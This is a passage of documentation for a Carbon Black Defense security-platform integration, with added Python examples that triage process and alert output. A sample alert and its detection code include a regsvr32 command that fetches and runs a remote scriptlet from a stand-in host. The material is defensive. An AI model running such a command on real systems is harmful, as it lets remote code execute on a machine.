| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetCommandLine | Target command line |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetPid | Target PID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.UserName | User name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentPrivatePid | Parent private PID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.PrivatePid | Private PID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetName | Target name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetPrivatePid | Target private PID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ThreatIndicators | Threat indicators |
Command Example
!cbd-find-event eventId="4ad25ae99a4911e88515b3c49ffeda59"
Context Example
CarbonBlackDefense:{} 1 item
FindEvent:{} 1 item
EventInfo:{} 13 items
ShortDescription:The application "cloud-drive-ui" successfully closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22).
LongDescription:The application "/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui" closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22) from 192.168.2.125:56001. There were 8169 Bytes Received and 2863 Bytes Sent in less than 1 second. The device was off the corporate network using the public address 67.143.208.113 (192.168.2.125, located in United States). The operation was successful.
EventTime:1533649991975
CreateTime:1533650036964
DeviceDetails:{} 13 items
DeviceName:cberninger-mac2
DeviceVersion:MAC OS X 10.10.5
TargetPriorityCode:1
DeviceHostName:null
GroupName:null
DeviceLocation:{} 10 items
CountryName:United States
CountryCode:US
DmaCode:0
MetroCode:0
City:null
Latitude:37.751007
Longitude:-97.822
Region:null
PostalCode:null
AreaCode:0
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
DeviceIpAddress:67.143.208.113
DeviceIpV4Address:67.143.208.113
AgentLocation:OFFSITE
Email:cberninger
ProcessDetails:{} 15 items
ParentPid:null
FullUserName:cberninger
PrivatePid:1071-1533502548722-245
ProcessId:1071
Name:cloud-drive-ui
TargetCommandLine:null
ParentPrivatePid:null
MilisSinceProcessStart:147443253
ParentName:null
ParentCommandLine:null
UserName:cberninger
TargetPrivatePid:null
TargetPid:null
TargetName:null
CommandLine:null
EventType:NETWORK
EventId:4ad25ae99a4911e88515b3c49ffeda59
ParentHash:{} 2 items
ApplicationName:null
Sha256Hash:null
ProcessHash:{} 5 items
ApplicationName:null
ApplicationPath:null
Md5Hash:null
ReputationProperty:null
Sha256Hash:null
ThreatIndicators:[] 2 items
0:UNKNOWN_APP
1:NETWORK_FLOW
OrgDetails:{} 3 items
OrganizationId:null
OrganizationName:null
OrganizationType:null
TargetHash:{} 3 items
ApplicationName:null
ReputationProperty:null
Sha256Hash:null
Human Readable Output
| CreateTime | 1533650036964 |
|---|---|
| DeviceDetails AgentLocation | OFFSITE |
| DeviceDetails DeviceHostName | |
| DeviceDetails DeviceId | 844355 |
| DeviceDetails DeviceIpAddress | 67.143.208.113 |
| DeviceDetails DeviceIpV4Address | 67.143.208.113 |
| DeviceDetails DeviceLocation AreaCode | 0 |
| DeviceDetails DeviceLocation City | |
| DeviceDetails DeviceLocation CountryCode | US |
| DeviceDetails DeviceLocation CountryName | United States |
| DeviceDetails DeviceLocation DmaCode | 0 |
| DeviceDetails DeviceLocation Latitude | 37.751007 |
| DeviceDetails DeviceLocation Longitude | -97.822 |
| DeviceDetails DeviceLocation MetroCode | 0 |
| DeviceDetails DeviceLocation PostalCode | |
| DeviceDetails DeviceLocation Region | |
| DeviceDetails DeviceName | cberninger-mac2 |
| DeviceDetails DeviceType | MAC |
| DeviceDetails DeviceVersion | MAC OS X 10.10.5 |
| DeviceDetails Email | cberninger |
Get multiple processes
Returns the details of multiple processes, as specified by further input.
Base Command
cbd-find-processes
Input
| Parameter | Description | More Information |
|---|---|---|
| hostNameExact | The exact host name. | Case sensitive. |
| ownerName | Owner name. | Case insensitive. |
| ownerNameExact | Exact owner name. | Case sensitive. |
| ipAddress | External or internal IP address. | - |
| searchWindow | Events generated within a given time frame. | Default is one day. Events may not be available after 30 days due to retention policies. |
| start | Shows results from this row onward. | - |
| rows | Maximum number of rows of results. | This parameter can be limited on the Cb Defense server side. |
Context Output
| Path | Description |
|---|---|
| CarbonBlackDefense.GetProcesses.ApplicationName | Application name |
| CarbonBlackDefense.GetProcesses.ProcessId | Process ID |
| CarbonBlackDefense.GetProcesses.NumEvents | Number of events |
| CarbonBlackDefense.GetProcesses.ApplicationPath | Application path |
| CarbonBlackDefense.GetProcesses.PrivatePid | Private PID |
| CarbonBlackDefense.GetProcesses.Sha256Hash | SHA-256 hash |
| CarbonBlackDefense.GetProcesses.TotalResults | Total results |
Command Example
!cbd-find-processes ipAddress="67.143.208.113" rows=2
Context Example
CarbonBlackDefense:{} 1 item
GetProcesses:[] 3 items
0:{} 6 items
ApplicationName:Google Chrome
ApplicationPath:/Applications/Google Chrome.app/Contents/MacOS/Google Chrome
NumEvents:3580
PrivatePid:81577-1533502547808-202
ProcessId:81577
Sha256Hash:19509e92f048f64692a3bc8786f7e74906541c4b548964c69a22ad9e44e43a2d
1:{} 6 items
ApplicationName:cloud-drive-ui
ApplicationPath:/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui
NumEvents:2038
PrivatePid:1071-1533502548722-245
ProcessId:1071
Sha256Hash:f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b
2:{} 1 item
TotalResults:2
Human Readable Output
| ApplicationName | ApplicationPath | NumEvents | PrivatePid | ProcessId | Sha256Hash |
|---|---|---|---|---|---|
| Google Chrome | /Applications/Google Chrome.app/Contents/MacOS/Google Chrome | 3580 | 81577-1533502547808-202 | 81577 | 19509e92f048f64692a3bc8786f7e74906541c4b548964c69a22ad9e44e43a2d |
| cloud-drive-ui | /Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui | 2038 | 1071-1533502548722-245 | 1071 | f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b |
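Worked example, added here and not part of the integration or of the original page: triaging the GetProcesses context returned by cbd-find-processes. The input list is the two processes from the context example above, re-typed as constructed data (including the trailing TotalResults record the integration appends). The list of user-writable locations and the reading of PrivatePid as pid-startMs-seq are assumptions made for this example, inferred from the sample values, not documented behaviour of Carbon Black.

```python
"""Triage cbd-find-processes output (added example; not code from the integration).

The sample list is re-typed from the context example above. The heuristics
(user-writable paths, ApplicationName vs. file name, PrivatePid layout of
pid-startMs-seq inferred from the samples) are this example's assumptions,
not documented behaviour of Carbon Black or the integration.
"""
import re
from datetime import datetime, timezone

# Constructed from the page's context example, including the trailing
# TotalResults entry that the integration appends to the list.
SAMPLE_PROCESSES = [
    {"ApplicationName": "Google Chrome",
     "ApplicationPath": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome",
     "NumEvents": 3580, "PrivatePid": "81577-1533502547808-202", "ProcessId": 81577,
     "Sha256Hash": "19509e92f048f64692a3bc8786f7e74906541c4b548964c69a22ad9e44e43a2d"},
    {"ApplicationName": "cloud-drive-ui",
     "ApplicationPath": "/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui",
     "NumEvents": 2038, "PrivatePid": "1071-1533502548722-245", "ProcessId": 1071,
     "Sha256Hash": "f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b"},
    {"TotalResults": 2},
]

# Locations a non-admin user can write to (assumption of this example).
USER_WRITABLE_PREFIXES = ("/Users/", "/tmp/", "/private/tmp/", "/var/tmp/",
                          "C:\\Users\\", "C:\\Windows\\Temp\\")
PRIVATE_PID_RE = re.compile(r"^(?P<pid>\d+)-(?P<start_ms>\d+)-(?P<seq>\d+)$")


def parse_private_pid(private_pid):
    """Split 'pid-startMs-seq' into parts; None if the layout does not match."""
    m = PRIVATE_PID_RE.match(private_pid or "")
    if not m:
        return None
    started = datetime.fromtimestamp(int(m["start_ms"]) / 1000, tz=timezone.utc)
    return {"pid": int(m["pid"]), "started": started, "seq": int(m["seq"])}


def triage_processes(processes):
    """One finding per process: why it is interesting, plus the hash to pivot on.
    Entries without a Sha256Hash (the TotalResults record) are skipped."""
    findings = []
    for p in processes:
        if "Sha256Hash" not in p:
            continue
        reasons = []
        path = p["ApplicationPath"]
        if path.startswith(USER_WRITABLE_PREFIXES):
            reasons.append("runs from a user-writable location")
        file_name = path.replace("\\", "/").rsplit("/", 1)[-1]
        if file_name.lower() != p["ApplicationName"].lower():
            reasons.append("ApplicationName differs from the on-disk file name")
        meta = parse_private_pid(p.get("PrivatePid"))
        if meta and meta["pid"] != p["ProcessId"]:
            reasons.append("PrivatePid does not match ProcessId")
        findings.append({
            "name": p["ApplicationName"],
            "sha256": p["Sha256Hash"],
            "started": meta["started"].isoformat() if meta else None,
            "suspicious": bool(reasons),
            "reasons": reasons,
        })
    return findings


def unique_hashes(processes):
    """De-duplicated SHA-256 list, so each binary gets one reputation lookup."""
    return sorted({p["Sha256Hash"] for p in processes if "Sha256Hash" in p})


if __name__ == "__main__":
    for f in triage_processes(SAMPLE_PROCESSES):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{flag:10} {f['name']:16} {f['started']}  {'; '.join(f['reasons'])}")
    print("hashes to look up:", unique_hashes(SAMPLE_PROCESSES))
```

The cloud-drive-ui process is flagged only because it runs from a home directory; that is a prompt to check its hash, not a verdict. Because the integration appends the TotalResults record to the same list, any loop over GetProcesses has to skip entries that carry no process fields, as triage_processes does.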
Get alert details
Returns the details of a specified alert.
Base Command
cbd-get-alert-details
Input
| Parameter | Description |
| alertId | Alert ID |
Context Output
| Path | Description |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceType | Device type |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.Group | Group |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.GroupId | Group ID |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.RegisteredTime | Registered time |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceId | Device ID |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceName | Device name |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.Status | Status |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.OsVersion | OS version |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.SensorVersion | Sensor version |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.UserName | User name |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.Importance | Importance |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.Message | Message |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.Success | Success |
| CarbonBlackDefense.GetAlertDetails.Events.ParentHash | Parent hash |
| CarbonBlackDefense.GetAlertDetails.Events.PolicyState | Policy state |
| CarbonBlackDefense.GetAlertDetails.Events.LongDescription | Long description |
| CarbonBlackDefense.GetAlertDetails.Events.ParentPid | Parent PID |
| CarbonBlackDefense.GetAlertDetails.Events.ProcessId | Process ID |
| CarbonBlackDefense.GetAlertDetails.Events.ThreatIndicators | Threat indicators |
| CarbonBlackDefense.GetAlertDetails.Events.ApplicationPath | Application path |
| CarbonBlackDefense.GetAlertDetails.Events.ProcessHash | Process hash |
| CarbonBlackDefense.GetAlertDetails.Events.ProcessMd5Hash | Process MD5 hash |
| CarbonBlackDefense.GetAlertDetails.Events.EventId | Event ID |
| CarbonBlackDefense.GetAlertDetails.Events.EventTime | Event time |
| CarbonBlackDefense.GetAlertDetails.Events.EventType | Event type |
| CarbonBlackDefense.GetAlertDetails.Events.KillChainStatus | Kill chain status |
| CarbonBlackDefense.GetAlertDetails.Events.ParentName | Parent name |
| CarbonBlackDefense.GetAlertDetails.Events.ParentPPid | Parent PPID |
| CarbonBlackDefense.GetAlertDetails.Events.ProcessPPid | Process PPID |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.IncidentId | Incident ID |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.ApplicationName | Application name |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.IndicatorName | Indicator name |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.Sha256Hash | SHA-256 hash |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.Summary | Summary |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.ThreatId | Threat ID |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.ThreatScore | Threat score |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.Time | Time |
Command Example
!cbd-get-alert-details alertId=HWOXYQ6P
Context Example
Account:{} 2 items
CarbonBlackDefense:{} 2 items
GetAlertDetails:{} 1 item
DeviceInfo:{} 4 items
DeviceInfo:{} 13 items
DeviceName:ECIADWS7
Success:true
Message:success
RegisteredTime:1525879595477
DeviceType:WINDOWS
DeviceId:896327
Status:REGISTERED
OsVersion:Windows 7 x86 SP: 1
Importance:MEDIUM
UserName:EVILCORP\Expel
GroupId:0
SensorVersion:3.1.0.100
Group:null
Events:{} 17 items
OrgId:1105
ThreatInfo:{} 6 items
IncidentId:HWOXYQ6P
Indicators:{} 3 items
ApplicationName:[] 64 items
IndicatorName:[] 64 items
Sha256Hash:[] 64 items
Summary:The application regsvr32.exe is executing an encoded fileless script.
ThreatId:218c1859d76eb42113590f9da21e2cec
ThreatScore:5
Time:1533253999790
Endpoint:{} 2 items
Hostname:ECIADWS7
OS:WINDOWS
Process:{} 7 items
CommandLine:regsvr32.exe /s /u /i:http://example.com/file.sct scrobj.dll
Endpoint:ECIADWS7
MD5:432be6cf7311062633459eef6b242fb5
PID:12804
ParentID:10808
ParentName:alert_generator.bat
Path:C:\Windows\System32\regsvr32.exe
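Worked example, added here and not part of the integration or of the original page: turning the cbd-get-alert-details context above into a triage record. The alert is re-typed from the context example (incident HWOXYQ6P on ECIADWS7) as constructed input, trimmed to the fields used. The regsvr32 scriptlet check, the IOC extraction and the ATT&CK mapping are this example's own logic, not output of the integration.

```python
"""Triage a cbd-get-alert-details result (added example; not integration code).

SAMPLE_ALERT is re-typed from the context example above (alert HWOXYQ6P on
ECIADWS7), trimmed to the fields used. The regsvr32 detection, the IOC
extraction and the ATT&CK mapping are this example's own, not output of the
integration; the Process key is the standard context shown on the page.
"""
import re
from urllib.parse import urlparse

# Constructed from the page's context example.
SAMPLE_ALERT = {
    "CarbonBlackDefense": {"GetAlertDetails": {
        "DeviceInfo": {"DeviceName": "ECIADWS7", "DeviceType": "WINDOWS",
                       "OsVersion": "Windows 7 x86 SP: 1", "Importance": "MEDIUM",
                       "UserName": "EVILCORP\\Expel", "SensorVersion": "3.1.0.100"},
        "ThreatInfo": {"IncidentId": "HWOXYQ6P", "ThreatScore": 5,
                       "ThreatId": "218c1859d76eb42113590f9da21e2cec",
                       "Summary": "The application regsvr32.exe is executing an encoded fileless script."},
    }},
    "Process": {"CommandLine": "regsvr32.exe /s /u /i:http://example.com/file.sct scrobj.dll",
                "MD5": "432be6cf7311062633459eef6b242fb5", "PID": 12804,
                "ParentID": 10808, "ParentName": "alert_generator.bat",
                "Path": "C:\\Windows\\System32\\regsvr32.exe"},
}

# regsvr32 /i:<scriptlet> ... scrobj.dll executes a COM scriptlet, fetched over the
# network when the target is a URL: MITRE ATT&CK T1218.010
# (System Binary Proxy Execution: Regsvr32).
SCRIPTLET_ARG = re.compile(r"(?i)^[/-]i:(?P<target>.+)$")


def split_cmdline(cmdline):
    """Minimal Windows argv split: a double-quoted span stays inside its argument."""
    return [a.replace('"', "") for a in re.findall(r'(?:[^\s"]+|"[^"]*")+', cmdline)]


def triage_regsvr32(cmdline):
    """Return (is_scriptlet_execution, target); target is whatever follows /i:."""
    argv = split_cmdline(cmdline)
    if not argv or "regsvr32" not in argv[0].lower():
        return False, None
    target = None
    for arg in argv[1:]:
        m = SCRIPTLET_ARG.match(arg)
        if m:
            target = m["target"]
    uses_scrobj = any(a.lower().endswith("scrobj.dll") for a in argv[1:])
    return bool(target) and uses_scrobj, target


def extract_indicators(alert):
    """Build the record to pin to the incident: who/where, the verdict, and the
    indicators (hash, URL, domain) worth blocking or hunting for."""
    details = alert["CarbonBlackDefense"]["GetAlertDetails"]
    proc = alert["Process"]
    is_hit, target = triage_regsvr32(proc["CommandLine"])
    iocs = {"md5": [proc["MD5"]], "url": [], "domain": []}
    if target and target.lower().startswith(("http://", "https://")):
        iocs["url"].append(target)
        iocs["domain"].append(urlparse(target).hostname)
    return {
        "incident_id": details["ThreatInfo"]["IncidentId"],
        "host": details["DeviceInfo"]["DeviceName"],
        "user": details["DeviceInfo"]["UserName"],
        "threat_score": details["ThreatInfo"]["ThreatScore"],
        "parent": proc["ParentName"],
        "technique": "T1218.010" if is_hit else None,
        "verdict": "malicious" if is_hit else "needs-review",
        "iocs": iocs,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(extract_indicators(SAMPLE_ALERT), indent=2))
```

The verdict rests on the command line, not on the ThreatScore: a regsvr32 run that registers a local DLL with /s and no /i: scriptlet comes back as needs-review, while a quoted /i: path or a URL target together with scrobj.dll is the pattern the sample alert shows. The MD5 from the Process context is always kept, since it is the one indicator the page guarantees for the alert.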
Get all policy details
Returns the details of all policies.
Base Command
cbd-get-policies
Input
There is no input for this command.
Context Output
| Path | Description |
| CarbonBlackDefense.GetPolicies.Id | The policy ID |
| CarbonBlackDefense.GetPolicies.PriorityLevel | The policy's priority level |
| CarbonBlackDefense.GetPolicies.SystemPolicy | System policy (boolean) |
| CarbonBlackDefense.GetPolicies.LatestRevision | The policy's latest revision |
| CarbonBlackDefense.GetPolicies.Policy | The policy object |
Command Example
!cbd-get-policies
Context Example
CarbonBlackDefense:{} 1 item
GetPolicies:[] 40 items
0:{} 5 items
Id:6525
LatestRevision:1488926710902
Policy:{} 6 items
avSettings:{} 6 items
apc:{} 4 items
enabled:false
maxExeDelay:45
maxFileSize:4
riskLevel:4
features:[] 3 items
0:{} 2 items
enabled:false
name:SIGNATURE_UPDATE
1:{} 2 items
enabled:false
name:ONACCESS_SCAN
2:{} 2 items
enabled:true
name:ONDEMAND_SCAN
onAccessScan:{} 1 item
profile:NORMAL
onDemandScan:{} 4 items
profile:NORMAL
scanCdDvd:AUTOSCAN
scanUsb:AUTOSCAN
schedule:{} 4 items
days:null
rangeHours:0
recoveryScanIfMissed:true
startHour:0
signatureUpdate:{} 1 item
schedule:{} 3 items
fullIntervalHours:0
initialRandomDelayHours:4
intervalHours:4
updateServers:{} 2 items
servers:[] 1 item
0:{} 3 items
flags:0
regId:null
server:[] 1 item
0:http://updates.cdc.carbonblack.io/update
serversForOffSiteDevices:[] 1 item
0:http://updates.cdc.carbonblack.io/update
directoryActionRules:[] 0 items
id:-1
knownBadHashAutoDeleteDelayMs:null
rules:[] 0 items
sensorSettings:[] 24 items
0:{} 2 items
name:ALLOW_UNINSTALL
value:true
1:{} 2 items
name:ALLOW_UPLOADS
value:false
2:{} 2 items
name:SHOW_UI
value:false
3:{} 2 items
name:ENABLE_THREAT_SHARING
value:true
4:{} 2 items
name:QUARANTINE_DEVICE
value:false
5:{} 2 items
name:LOGGING_LEVEL
value:NORMAL
6:{} 2 items
name:QUARANTINE_DEVICE_MESSAGE
value:Your device has been quarantined. Please contact your administrator.
7:{} 2 items
name:SET_SENSOR_MODE
value:0
8:{} 2 items
name:SENSOR_RESET
value:0
9:{} 2 items
name:BACKGROUND_SCAN
value:false
10:{} 2 items
name:POLICY_ACTION_OVERRIDE
value:true
11:{} 2 items
name:HELP_MESSAGE
value:
12:{} 2 items
name:PRESERVE_SYSTEM_MEMORY_SCAN
value:false
13:{} 2 items
name:HASH_MD5
value:false
14:{} 2 items
name:SCAN_LARGE_FILE_READ
value:false
15:{} 2 items
name:SCAN_EXECUTE_ON_NETWORK_DRIVE
value:false
16:{} 2 items
name:DELAY_EXECUTE
value:false
17:{} 2 items
name:SCAN_NETWORK_DRIVE
value:false
18:{} 2 items
name:BYPASS_AFTER_LOGIN_MINS
value:0
19:{} 2 items
name:BYPASS_AFTER_RESTART_MINS
value:0
20:{} 2 items
name:SHOW_FULL_UI
value:false
21:{} 2 items
name:SECURITY_CENTER_OPT
value:false
22:{} 2 items
name:CB_LIVE_RESPONSE
value:false
23:{} 2 items
name:UNINSTALL_CODE
value:false
PriorityLevel:MEDIUM
SystemPolicy:true
Get the details of a specified policy
Returns the details of a specified policy.
Base Command
cbd-get-policy
Input
| Parameter | Description |
| policyId | Policy ID |
Context Output
| Path | Description |
| CarbonBlackDefense.GetPolicy.Id | The policy ID |
| CarbonBlackDefense.GetPolicy.PriorityLevel | The policy's priority level |
| CarbonBlackDefense.GetPolicy.SystemPolicy | System policy (boolean) |
| CarbonBlackDefense.GetPolicy.LatestRevision | The policy's latest revision |
| CarbonBlackDefense.GetPolicy.Policy | The policy object |
Command Example
!cbd-get-policy policyId=6525
Context Example
CarbonBlackDefense:{} 1 item
GetPolicy:{} 5 items
Id:6525
LatestRevision:1488926710902
Policy:{} 6 items
avSettings:{} 6 items
apc:{} 4 items
enabled:false
maxExeDelay:45
maxFileSize:4
riskLevel:4
features:[] 3 items
0:{} 2 items
enabled:false
name:SIGNATURE_UPDATE
1:{} 2 items
enabled:false
name:ONACCESS_SCAN
2:{} 2 items
enabled:true
name:ONDEMAND_SCAN
onAccessScan:{} 1 item
profile:NORMAL
onDemandScan:{} 4 items
profile:NORMAL
scanCdDvd:AUTOSCAN
scanUsb:AUTOSCAN
schedule:{} 4 items
days:null
rangeHours:0
recoveryScanIfMissed:true
startHour:0
signatureUpdate:{} 1 item
schedule:{} 3 items
fullIntervalHours:0
initialRandomDelayHours:4
intervalHours:4
updateServers:{} 2 items
servers:[] 1 item
0:{} 3 items
flags:0
regId:null
server:[] 1 item
0:http://updates.cdc.carbonblack.io/update
serversForOffSiteDevices:[] 1 item
0:http://updates.cdc.carbonblack.io/update
directoryActionRules:[] 0 items
id:-1
knownBadHashAutoDeleteDelayMs:null
rules:[] 0 items
sensorSettings:[] 24 items
0:{} 2 items
name:ALLOW_UNINSTALL
value:true
1:{} 2 items
name:ALLOW_UPLOADS
value:false
2:{} 2 items
name:SHOW_UI
value:false
3:{} 2 items
name:ENABLE_THREAT_SHARING
value:true
4:{} 2 items
name:QUARANTINE_DEVICE
value:false
5:{} 2 items
name:LOGGING_LEVEL
value:NORMAL
6:{} 2 items
name:QUARANTINE_DEVICE_MESSAGE
value:Your device has been quarantined. Please contact your administrator.
7:{} 2 items
name:SET_SENSOR_MODE
value:0
8:{} 2 items
name:SENSOR_RESET
value:0
9:{} 2 items
name:BACKGROUND_SCAN
value:false
10:{} 2 items
name:POLICY_ACTION_OVERRIDE
value:true
11:{} 2 items
name:HELP_MESSAGE
value:
12:{} 2 items
name:PRESERVE_SYSTEM_MEMORY_SCAN
value:false
13:{} 2 items
name:HASH_MD5
value:false
14:{} 2 items
name:SCAN_LARGE_FILE_READ
value:false
15:{} 2 items
name:SCAN_EXECUTE_ON_NETWORK_DRIVE
value:false
16:{} 2 items
name:DELAY_EXECUTE
value:false
17:{} 2 items
name:SCAN_NETWORK_DRIVE
value:false
18:{} 2 items
name:BYPASS_AFTER_LOGIN_MINS
value:0
19:{} 2 items
name:BYPASS_AFTER_RESTART_MINS
value:0
20:{} 2 items
name:SHOW_FULL_UI
value:false
21:{} 2 items
name:SECURITY_CENTER_OPT
value:false
22:{} 2 items
name:CB_LIVE_RESPONSE
value:false
23:{} 2 items
name:UNINSTALL_CODE
value:false
PriorityLevel:MEDIUM
SystemPolicy:true
Human Readable Output
| Id | 6525 |
|---|---|
| LatestRevision | 1488926710902 |
| Policy | {"rules":[],"id":-1,"sensorSettings":[{"name":"ALLOW_UNINSTALL","value":"true"},{"name":"ALLOW_UPLOADS","value":"false"},{"name":"SHOW_UI","value":"false"},{"name":"ENABLE_THREAT_SHARING","value":"true"},{"name":"QUARANTINE_DEVICE","value":"false"},{"name":"LOGGING_LEVEL","value":"NORMAL"},{"name":"QUARANTINE_DEVICE_MESSAGE","value":"Your device has been quarantined. Please contact your administrator."},{"name":"SET_SENSOR_MODE","value":"0"},{"name":"SENSOR_RESET","value":"0"},{"name":"BACKGROUND_SCAN","value":"false"},{"name":"POLICY_ACTION_OVERRIDE","value":"true"},{"name":"HELP_MESSAGE","value":""},{"name":"PRESERVE_SYSTEM_MEMORY_SCAN","value":"false"},{"name":"HASH_MD5","value":"false"},{"name":"SCAN_LARGE_FILE_READ","value":"false"},{"name":"SCAN_EXECUTE_ON_NETWORK_DRIVE","value":"false"},{"name":"DELAY_EXECUTE","value":"false"},{"name":"SCAN_NETWORK_DRIVE","value":"false"},{"name":"BYPASS_AFTER_LOGIN_MINS","value":"0"},{"name":"BYPASS_AFTER_RESTART_MINS","value":"0"},{"name":"SHO ...http://updates.cdc.carbonblack.io/update"],"servers":[{"server":["http://updates.cdc.carbonblack.io/update"],"flags":0,"regId":null}]},"apc":{"maxFileSize":4,"maxExeDelay":45,"riskLevel":4,"enabled":false},"onAccessScan":{"profile":"NORMAL"},"onDemandScan":{"profile":"NORMAL","scanCdDvd":"AUTOSCAN","scanUsb":"AUTOSCAN","schedule":{"days":null,"rangeHours":0,"startHour":0,"recoveryScanIfMissed":true}},"signatureUpdate":{"schedule":{"intervalHours":4,"fullIntervalHours":0,"initialRandomDelayHours":4}}},"knownBadHashAutoDeleteDelayMs":null,"directoryActionRules":[]} |
| PriorityLevel | MEDIUM |
| SystemPolicy | true |
Create a policy
Creates a policy, as prescribed by further input.
Base Command
cbd-create-policy
Input
| Parameter | Description |
| description | Policy description |
| name | A single-line name for the policy |
| priorityLevel | Priority score associated with sensors assigned to this policy |
| policy | JSON object containing the policy details. Make sure a valid policy object is passed; the command example below shows the expected shape. |
Context Output
| Path | Description |
| CarbonBlackDefense.CreatePolicy.PolicyId | The new policy ID |
Command Example
!cbd-create-policy priorityLevel=LOW name=YARDENTEST3 description=yardentesttest3 policy={ "policyInfo": { "description": "test policy for documentation", "name": "documentation test", "policy": { "avSettings": { "apc": { "enabled": false, "maxExeDelay": 45, "maxFileSize": 4, "riskLevel": 4 }, "features": [ { "enabled": false, "name": "SIGNATURE_UPDATE" }, { "enabled": true, "name": "ONACCESS_SCAN" }, { "enabled": true, "name": "ONDEMAND_SCAN" } ], "onAccessScan": { "profile": "NORMAL" }, "onDemandScan": { "profile": "NORMAL", "scanCdDvd": "AUTOSCAN", "scanUsb": "AUTOSCAN", "schedule": { "days": null, "rangeHours": 0, "recoveryScanIfMissed": true, "startHour": 0 } }, "signatureUpdate": { "schedule": { "fullIntervalHours": 0, "initialRandomDelayHours": 4, "intervalHours": 2 } }, "updateServers": { "servers": [ { "flags": 0, "regId": null, "server": [ "http://updates.cdc.carbonblack.io/update" ] } ], "serversForOffSiteDevices": [ "http://updates.cdc.carbonblack.io/update" ] } }, "directoryActionRules": [ { "actions": { "FILE_UPLOAD": false, "PROTECTION": false }, "path": "C:\\FXCM\\**" }, { "actions": { "FILE_UPLOAD": true, "PROTECTION": false }, "path": "sadf" }, { "actions": { "FILE_UPLOAD": true, "PROTECTION": false }, "path": "/Users/**" } ], "id": -1, "rules": [ { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 1, "operation": "RUN", "required": true }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "COMPANY_BLACK_LIST" }, "id": 2, "operation": "RUN", "required": true }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 3, "operation": "NETWORK", "required": false }, { "action": "TERMINATE", "application": { "type": "REPUTATION", "value": "ADAPTIVE_WHITE_LIST" }, "id": 5, "operation": "RANSOM", "required": false }, { "action": "IGNORE", "application": { "type": "NAME_PATH", "value": "**\\devenv.exe" }, "id": 4, "operation": "RANSOM", "required": false }, { "action": "DENY", "application": { "type": "NAME_PATH", "value": "%SystemDrive%\\Windows\\System32\\notepad2.exe" }, "id": 10, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 11, "operation": "RANSOM", "required": true }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 13, "operation": "MEMORY_SCRAPE", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 14, "operation": "CODE_INJECTION", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 15, "operation": "RUN_INMEMORY_CODE", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 17, "operation": "POL_INVOKE_NOT_TRUSTED", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 18, "operation": "INVOKE_CMD_INTERPRETER", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 20, "operation": "INVOKE_SCRIPT", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "RESOLVING" }, "id": 22, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "PUP" }, "id": 23, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "SUSPECT_MALWARE" }, "id": 24, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "ADAPTIVE_WHITE_LIST" }, "id": 25, "operation": "NETWORK", "required": false }, { "action": "ALLOW", "application": { "type": "NAME_PATH", "value": "c:\\test\\**" }, "id": 26, "operation": "INVOKE_SCRIPT", "required": false } ], "sensorSettings": [ { "name": "SHOW_UI", "value": 